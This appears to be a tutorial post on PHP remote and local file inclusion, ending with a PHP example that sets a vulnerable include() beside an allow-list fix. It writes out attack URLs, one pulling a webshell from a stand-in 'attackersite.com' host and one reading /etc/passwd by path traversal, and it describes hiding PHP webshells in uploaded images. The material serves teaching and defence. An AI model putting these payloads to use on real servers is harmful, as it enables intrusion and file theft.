WHAT AND HOW?
The whole technique is called FI, which means file inclusion; the only difference between its two forms is where the included file lives. RFI stands for remote file inclusion, which means that files are included from a remote server, and LFI stands for local file inclusion, which means that only local files (files on the same server) can be included. Don't be fooled by the fact that only local files can be included: it is a pretty dangerous attack too if you consider that PHP code can be injected inside images and then loaded via LFI, and the fact that someone can load any file from your server is dangerous enough on its own. One more thing I need to mention is that most RFI and LFI vulnerabilities are the result of bad programming by people who don't know much about security.
THE ATTACK
To start, let me explain remote file inclusion first, because you will get the bigger picture later when I start explaining the local one. Take for example a website www.mywebsite.com/index.php?news=latest
Now notice the end of the URL, where "latest" is included. "latest" is actually "latest.php", but the extension is not shown on most websites. What would happen on a vulnerable website if we tried to include, for example, google.com instead of latest? The example URL would look like this:
www.mywebsite.com/index.php?news=http://www.google.com This URL, instead of showing the latest news, will redirect you to the Google website. So you will probably say now, "so what if it redirects, there is nothing dangerous in that." You are not quite right there, and you know why? Take a look at the next example and you will figure it out. Let's assume that instead of Google's website we include a file that is on another server, like www.mywebsite.com/index.php?news=http://www.attackersite.com/hacked.txt
Now, instead of your website showing the latest news, it will show the file called "hacked.txt" instead. If we assume that hacked.txt contains some malicious code, like a webshell, the only thing that needs to be added at the end of the above URL is a question mark (?), so that whatever the script appends to the parameter (such as the .php extension) is treated as part of the remote request's query string rather than the file name. The URL would then look like this: www.mywebsite.com/index.php?news=http://www.attackersite.com/hacked.txt?
What will happen now is that the webshell script on the attacker's server will be included and executed on your server, giving him access to your files and the opportunity to upload that code to your server for later access, and you don't want that to happen. Now that you understand the basics of RFI, let me explain the LFI method. As I already said, it consists of reading and including local files. I will use the same example from above and try to read /etc/passwd. The URL will look like this:
www.mywebsite.com/index.php?news=../etc/passwd and your passwd file is loaded for anyone to read. Now, just reading files is not what makes this method so dangerous; there is another possible scenario. What if somewhere on your website you have an upload form for uploading pictures, txt files and other things you need? An attacker could simply upload a picture with PHP code injected into it, for example a picture that contains the code of a webshell. If you open that picture normally you will see the picture, but if that picture is loaded via the LFI vulnerability no picture will be shown; the code inside it will simply be executed. So all the attacker needs to do is load the infected picture the way I described for /etc/passwd, and he has a shell on your server. Pretty dangerous, huh?
PROTECTION
The main thing that will save you from file inclusion is to specify the exact location of the files, so that either the right file is loaded or the script aborts and redirects somewhere. That works against both RFI and LFI attacks. Another important thing is to disable the PHP settings allow_url_fopen and allow_url_include. If for some reason you need to use the include() function, you should specify the name of the file that should be included and its location yourself, instead of grabbing that from $_GET, so that when including, the script checks whether the file has the right name and is loaded from the specified location, and aborts on a wrong name or location. Also, for RFI you will notice that every URL starts with http or www, so you should block or filter this. You can do this in .htaccess by specifying that if anything included starts with www or http, the request is redirected to a dummy file you create for that purpose. I hope that you now understand the danger of these attacks and have a better understanding of how to protect yourself from them.
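As an added example (not code from the original post), here is the kind of include() call that makes the "news=" attack above possible, placed next to a hardened version that follows the advice in this section: the request parameter is only ever used as a key into a fixed list of page names, the resolved path is checked to lie inside the directory where the pages live, and anything else aborts with a redirect to a safe default. The page names, the news/ directory and the redirect target are assumptions chosen for the example.

```php
<?php
// Added example, not from the original post. Shows the pattern the post warns
// about beside a hardened version that uses a fixed allow-list of page names,
// so neither "http://..." nor "../etc/passwd" can ever reach include().

// VULNERABLE (for illustration only): the request parameter is used directly.
// With allow_url_include on, a remote URL is fetched and executed; with it off,
// a relative path such as ../etc/passwd still reads arbitrary local files.
function include_news_unsafe(): void
{
    include $_GET['news'] . '.php';
}

// HARDENED: map the request value to a known file, never build a path from it.
const NEWS_PAGES = [
    'latest'  => 'latest.php',   // assumed page names for the example
    'archive' => 'archive.php',
];
const NEWS_DIR = __DIR__ . '/news';   // assumed location of the page files

/**
 * Resolve a user-supplied page name to an absolute path inside NEWS_DIR,
 * or return null if the name is not on the allow-list.
 */
function resolve_news_page(string $name): ?string
{
    if (!array_key_exists($name, NEWS_PAGES)) {
        return null;                                  // unknown name: abort
    }
    $path = realpath(NEWS_DIR . '/' . NEWS_PAGES[$name]);
    $base = realpath(NEWS_DIR);
    // Belt and braces: even an allow-listed entry must resolve inside NEWS_DIR.
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function include_news_safe(): void
{
    $page = resolve_news_page((string) ($_GET['news'] ?? 'latest'));
    if ($page === null) {
        // Wrong name or location: abort and redirect, as the post suggests.
        header('Location: /index.php?news=latest');
        exit;
    }
    include $page;
}

include_news_safe();
```

With this structure there is nothing for a URL-prefix filter to catch, because the value "http://www.attackersite.com/hacked.txt?" simply is not a key in NEWS_PAGES and the script redirects before include() is reached. The two ini settings the section mentions are set in php.ini as allow_url_fopen = Off and allow_url_include = Off; keep them off even with the allow-list in place, so that a second, less careful include() elsewhere in the site cannot reopen the remote path.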